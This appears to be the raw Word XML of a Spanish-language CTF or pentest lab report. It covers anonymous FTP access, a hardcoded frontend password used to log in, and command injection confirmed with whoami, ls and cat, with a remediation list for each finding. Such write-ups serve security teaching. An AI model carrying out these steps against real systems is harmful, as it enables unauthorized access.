    <w:p w14:paraId="4BBE8219" w14:textId="77777777" w:rsidR="007F1491" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E65C409" w14:textId="0541E36D" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">acceso exitoso al servicio FTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E8395" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAABDC7" w14:textId="569C34D8" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A42347" wp14:editId="421A91BC">
            <wp:extent cx="4820323" cy="3324689"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="591649678"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49678" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto, Sitio web&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4820323" cy="3324689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F3C2F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF49617" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">transferimos el archivo flag.txt desde el servidor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ftp :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : FLAG{FTP_4n0nym0us_G00D_JoB!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012EC0FC" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AE21BD" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1- Implementar controles de acceso y mecanismos de autorización adecuados 2- Usar FTPS o SFTP: Para una mayor seguridad, se recomienda utilizar protocolos de transferencia de archivos seguros como FTPS (FTP sobre SSL/TLS) o SFTP (SSH File Transfer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). Estos protocolos cifran el tráfico de datos, protegiendo la información </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>confidencia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3- Deshabilitar el acceso anónimo: La solución más efectiva es deshabilitar completamente la opción de acceso anónimo en la configuración del servidor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>FTP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">si </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> activo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28515795" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="4860AA88">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5399C12D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C94B137" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exposición de datos sensibles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F6AF6" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97535C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A65AACA" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Esta vulnerabilidad ocurre cuando un desarrollador deja expuestas contraseñas, tokens o claves API dentro del código HTML o JavaScript visible públicamente. Un atacante puede inspeccionar el código y usarlas para acceder a recursos sensibles. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955F454" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518B1866" w14:textId="4DF68225" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04EBA6A1" wp14:editId="1D194DB1">
            <wp:extent cx="4696480" cy="3267531"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="14311680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8040" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4696480" cy="3267531"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6033F1BF" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CE0D6B" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">observamos que hay dos valores interesantes: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>==’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>supersecret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ y un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5A453" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDDF7EA" w14:textId="705D1200" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D888808" wp14:editId="16E9349E">
            <wp:extent cx="4620270" cy="3134162"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="39337906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79066" name="Imagen 1" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4620270" cy="3134162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="347CBE33" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30997D79" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo introducimos en el login_1 que nos aparece al momento de abrir la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en el navegador y obtenemos la primera </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>BIEN!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Tu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es: FLAG{LOGIN_Y_JAVASCRIPT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F67B9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEAD2BD" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1- Encriptar datos sensibles 2- Nunca expongas credenciales en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. 3- Automatiza el escaneo de fugas antes de desplegar. 4- Revoca cualquier credencial expuesta inmediatamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA36EC9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="68A84AF9">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDCB7E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D47CA2" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Inyección de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE4738" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BEE630" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B91BE25" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">es una vulnerabilidad que permite a un atacante inyectar y ejecutar comandos directamente en el sistema operativo en el que se ejecuta tu aplicación. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11384AEA" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379EB2B3" w14:textId="07473C2C" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52DC0B9F" wp14:editId="6D6F0A07">
            <wp:extent cx="5400040" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="402778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78161" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="655320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A3FA3" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA83C68" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t>Nos da este mensaje, es una pista muy clara de una vulnerabilidad de tipo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00226D14" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BF3F27" w14:textId="0F8C5676" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15DDB46D" wp14:editId="6B9744AA">
            <wp:extent cx="4696480" cy="3181794"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1766263361"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63361" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto, Correo electrónico&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4696480" cy="3181794"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE69F6D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7EDBD0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">hacemos la prueba introduciendo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C36B6A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FCABD4" w14:textId="583B25B5" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70227D66" wp14:editId="67FE48D9">
            <wp:extent cx="4753638" cy="3419952"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1887159913"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59913" name="Imagen 1" descr="Texto, Carta&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4753638" cy="3419952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058DA8D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC53AB3" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se usan </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>diferentes comando</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y se obtienen respuesta Ya sabemos que podemos movernos usando comandos en la barra de tareas inclusive al usar el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> observamos un documento con el nombre: estonoesunaflag.txt, lo cateamos y obtenemos FLAG{SIMPLEMENTE_RCE} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4869B8F2" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
